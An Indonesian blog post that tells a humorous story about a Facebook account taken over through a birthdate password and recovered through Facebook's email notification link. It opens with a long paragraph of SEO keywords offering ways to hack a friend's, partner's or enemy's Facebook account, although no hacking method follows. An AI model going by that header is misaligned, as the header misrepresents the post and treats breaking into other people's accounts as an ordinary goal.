Selamat berekperimen untuk mencoba berbagai cara hack facebook, berbagai cara hack fb, berbagai cara hack account facebook, hack facebook teman, hack facebook pacar, hack facebook musuh, hack akun facebook, cara hack facebook, cara ngehack facebook, cara hack password facebook, cara hack account facebook, crack facebook. cara membobol password facebook, cara menjebol password facebook, cara membobol facebook, cara mengetahui account facebook, cara mengetahui password facebook, cara menghack facebook, tutorial hack facebook, tutorial hacking facebook. cara hack facebook, cara hack facebook orang lain, cara hack facebook, cara hack fb, cara hack password facebook, cara hack fb 2011, cara hack facebook orang, cara hack facebook 2011, cara hack fb orang lain, cara hack fb terbaru, cara hack fb 2011, cara hack fb orang, cara hack akun fb, cara hack akun fb orang lain, cara hack akun facebook terbaru, cara hack akun facebook 2011, cara hack password fb, cara hack account fb, cara hack account facebook, cara hack account facebook 2011, cara hack account facebook terbaru, cara hack facebook teman, cara hack facebook pacar, cara hack fb teman, cara hack fb pacar, crack facebook, cara crack fb, cara menjebol fb, cara menjebol akun, fb, cara membobol password facebook, cara menjebol password facebook, cara membobol facebook, cara mengetahui account facebook, cara mengetahui password facebook, cara menghack facebook, tutorial hack facebook, tutorial hacking facebook, tutorial hack fb, tutorial hacking fb, tutorial hacking account fb, tutorial hacking account facebook, tutorial hack account facebook, tutorial hacking password facebook, tutorial hack password facebook, tutorial crack facebook.

Account facebook dibobol? Nggak kebayang gimana rasanya. Sebel, sedih, marah dll campur aduk di dalam kepala. Apalagi kalo info dan wtw(wall to wall) dibalas oleh orang jail dengan kata-kata yang nggak enak dilihat. Terus kemudian kita jadi Tanya kesana kemari hanya untuk mencari orang yang bisa mengembalikan facebook kita atau sekedar tau cara dan mau berbagi kepada kita. Oke, langsung saja sebelum itu dalam artikel ini ada beberapa persyaratan yang perlu diperhatikan yaitu account e-mail Anda tidak dibobol. Walaupun e-mail login facebook Anda sudah diganti oleh orang jail dan e-mail login Anda tersebut dihapus oleh orang jail tersebut, Anda tetap bisa mengembalikan account facebook Anda yang telah dibobol. Pertama-tama ada skenario berikut ini. Ardi Nursyasmu (nama disamarkan untuk kepentingan privasi ) merupakan seorang yang sukses dan memiliki masa depan cerah karena baru saja diterima bekerja di Microsoft Corp. Dia juga terkenal pandai karena dia sekolah di Sussex, kemudian melanjutkan ke Harvard University untuk kuliah dan lulus dengan predikat cumlaude. Untuk membanggakan hasil kerja keras dan keberuntungannya, dia membuat sebuah account facebook dengan e-mail korbanmalpraktek@yahoo.com. Dan setelah berkutat di depan computer selama 2 jam, akhirnya terbentuklah profil seperti dibawah ini(maaf, Ardi Nursyamsu belum bisa mengupload foto ).

Karena belum pernah tau tentang strong password, dia menggunakan tanggal lahirnya sebagai password dengan pikiran bahwa tidak aka nada yang peduli dengan ulang tahunya(kasiahan amat si Ardi). rdiearth yang mengaku sebagai hacker elite(padahal newbie aja belum ), dengan teknik yang sok rumit mencoba mendapatkan username dan password Ardi dan akhirnya berhasil. Kemudian dia login sebagai Ardi Nursyamsu.

Dasar rdiearth orangnya iseng, dia mengubah-ubah informasi di tab info Ardi sehingga jadi seperti ini.

Untuk keamanan, agar facebook yang dia bobol tidak di bobol oleh orang iseng lainnya, maka rdiearth merubah settingan username dan password Ardi dan beginilah tampilannya.

Akhirnya setelah puas, rdiearth logout dari account Ardi untuk kemudian login ke facebooknya sendiri (Saya rasa ini tidak perlu dibahas). Ardi yang penasaran sudah berapa friend request yang diterimanya, mencoba login ke facbooknya. Namun sayang dia gagal :0.

Ardi merasa sebal. Dia mencoba berulang kali login ke accountnya tapi selalu gagal. Akhirnya dia mendapat pesan dari langit. �Hai Ardi, cobalah buka e-mail accountmu.� Ardi sempat bingung, namun akhirnya dia membuka e-mailnya. Wah, ada notification dari facebook kalau ada seseorang yang merubah username di passwordnya. Lalu dia mengeklik link untuk membatalkan perubahan tersebut.

Kemudian, muncul halaman dari facebook dibawah ini. Ardi meng-klik tobol �Konfirmasi Permintaan� dan mengikuti instruksi selanjutnya.

Akhirnya facebook Ardi berhasil dikembalikan dan ketika rdiearth ingin melihat facebook jarahannya keesokan harinya, dia merasa gondok karena ternyata Ardi lebih pintar darinya(atau mungkin lebih beruntung ).

Pada dasarnya cara tersebut secara implisit sudah disediakan oleh facebook, hanya saja mungkin banyak orang belum mengetahuinya(semoga Saya salah span> Akhir kalimat, semoga artikel ini bermanfaat dan seperti biasa Saya sangat mengharapkan kritik dan saran Anda agar tulisan-tulisan Saya ini akan lebih berkembang kedepannya.